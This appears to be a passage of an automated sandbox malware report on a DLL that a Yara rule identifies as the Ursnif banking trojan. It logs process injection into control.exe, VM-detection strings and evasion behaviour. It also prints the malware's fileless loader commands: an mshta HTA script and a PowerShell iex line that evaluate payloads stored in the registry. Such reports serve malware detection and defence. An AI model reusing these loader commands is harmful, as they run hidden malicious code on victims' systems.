Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462F8CE wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_0462F8CE

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_0462FD33

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: mshta.exe, 00000023.00000003.856754934.0000025397C3B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}J
Source: mshta.exe, 00000031.00000003.892638496.0000023B71221000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 0000002D.00000003.880596197.000002732AA5F000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001BAC LoadLibraryA,GetProcAddress,

0_2_10001BAC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04637EA1 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

3_2_04637EA1

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\control.exe

Thread created: unknown EIP: BD4F1580

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 5512			Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF694A512E0			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF694A512E0			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'

Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'

Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04622239 cpuid

3_2_04622239

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_046217C3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

3_2_046217C3

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001456 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_10001456

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_0464104F RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,

3_2_0464104F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_10001F0E

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
